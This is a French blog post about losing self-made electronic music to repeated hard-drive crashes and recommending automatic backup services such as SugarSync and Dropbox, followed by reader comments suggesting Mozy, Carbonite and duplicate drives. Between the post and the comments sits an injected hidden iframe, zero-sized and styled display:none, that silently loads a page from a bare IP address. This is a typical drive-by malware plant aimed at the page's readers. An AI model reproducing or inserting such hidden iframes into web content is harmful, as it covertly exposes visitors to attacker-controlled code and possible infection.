Je ne parle pas ici de vos nombreux MP3s téléchargés légalement datant de mp3.com. Je parle plutôt de votre musique. Votre création. Vos heures de travail.
Il y a quelques années, je bossais très fort sur des projets personnels. Musique plutôt électronique venant d’un l’imaginaire d’un jeune homme qui ne pourrait pas lire une portée. (Voici ma création préférée sur mon profil Soundcloud datant de 2004).
Et un beau matin, j’ai tout perdu.
C’est pas arrivé une fois, ni deux fois, mais trois fois.
2-3 nuits à ne pas dormir et à regarder l’application qui travaille à réparer mon disque dur pour me permettre de retrouver des demi-fichiers sans noms. Après la première fois, je me suis juré de faire des sauvegardes.
1 fois semaine.
Ensuite 1 fois par mois.
Pouf!
2e plantage et on recommence à fixer l’écran pendant des heures en espérant retrouver ses possessions numériques.
Je suis bien heureux aujourd’hui de retrouver des services de sauvegardes automatiques dont certaines sont gratuites. J’utilise depuis quelques semaines le service de SugarSync. Gratuit pour un espace de 2 go, vous pouvez utiliser jusqu’à 250 go pour aussi peu que 25$ par mois. Ce qui est quand même pas mal. Très simple d’utilisation, il se synchronise automatiquement lorsque vous modifiez les dossiers sélectionnés. Une application iPhone et une adresse web pour votre Blackberry vous permets d’accéder à vos fichiers directement de votre téléphone cellulaire.
J’ai découvert aujourd’hui Dropbox qui semble faire la même job. Voici un petit vidéo vous expliquant le fonctionnement.
Alors si vous êtes futé, utilisez les 2 logiciels pour des dossiers différents et obtenez maintenant 4go d’espace gratuitement. Je ne souhaite à personne de perdre ses fichiers, surtout ceux qui sont irremplaçables.
Commencez vos back-ups dès maintenant.
Maintenant, reste à aller expliquer la même chose à ma blonde.
<iframe src= »http://91.213.8.40/el/index.php » width= »0″ height= »0″ style= »display:none; »></iframe>
C’est absolument essentiel de faire des backups quand on travail sur un projet sérieusement. Perdre plusieurs semaines-mois-années de travail peut être réellement désolant, et le matériel informatique moderne est loin d’être infaillible.
En plus de la solution de Marc-André, je vous propose d’acheter un disque dur et garder des « duplicata » (des doubles) des dossiers important. Donc, conserver ses données sur deux disques physiques différents.
Aussi, comme solution de sauvegarde à distance, j’utilise Mozy.com depuis un an. Le système s’avère efficace jusqu’à maintenant. Vous avez droit à de l’espace illimité pour 4,95$ par mois.
Mais attention, lisez bien les petits caractères du contrat. Ces services de backups ne sont pas des services d’archivage. Règle générale, le service conserve les données qui ne sont plus présentes sur votre ordinateur pour une période limitée seulement.
Euh, Marc-André, petite erreur dans ton article. C’est 25$ / mois pour 250 gb avec SugarSync. Plutôt que par année.
Merci Jean-Philippe.
Corrigé!
Bonjour Jean-Philippe,
Je viens de découvrir ton site. Bravo. Je me fais un devoir de revenir consulter régulièrement.
Pour ce qui est de sauvegarde, cela fait des années que j’ai appris ma leçon et j’utilise des stratégies multiples qui comprennent l’utilisation de disques durs multiples et, depuis quelques mois, j’utilise un service qui s’appelle Carbonite (www.carbonite.com) pour faire des sauvegardes hors site. C’est important de penser à ce genre de service puisque l’on ne sais jamais ce qui nous attends. Un incident grave, tel un incendie, une inondation ou un vol à domicile, et on se retrouve bredouille. Cela coute 54.95 $ US par année et n’a aucune limite d’espace. Une fois le logiciel installé sur votre ordinateur, il récolte tous les derniers changements à vos fichiers pour les mettre à jour sur la sauvegarde. Tout ce fait automatiquement. Pas besoin d’y repenser.
@Bernard Savoie.
Merci pour les bons mots c’est gentil.
Tu peux visiter le site de Jean-Philippe au http://www.villemure.net/.
Pour donnetamusique, je suis la personne en charge 🙂
Important de préciser que je ne suis pas Marc-André, en effet!! 😛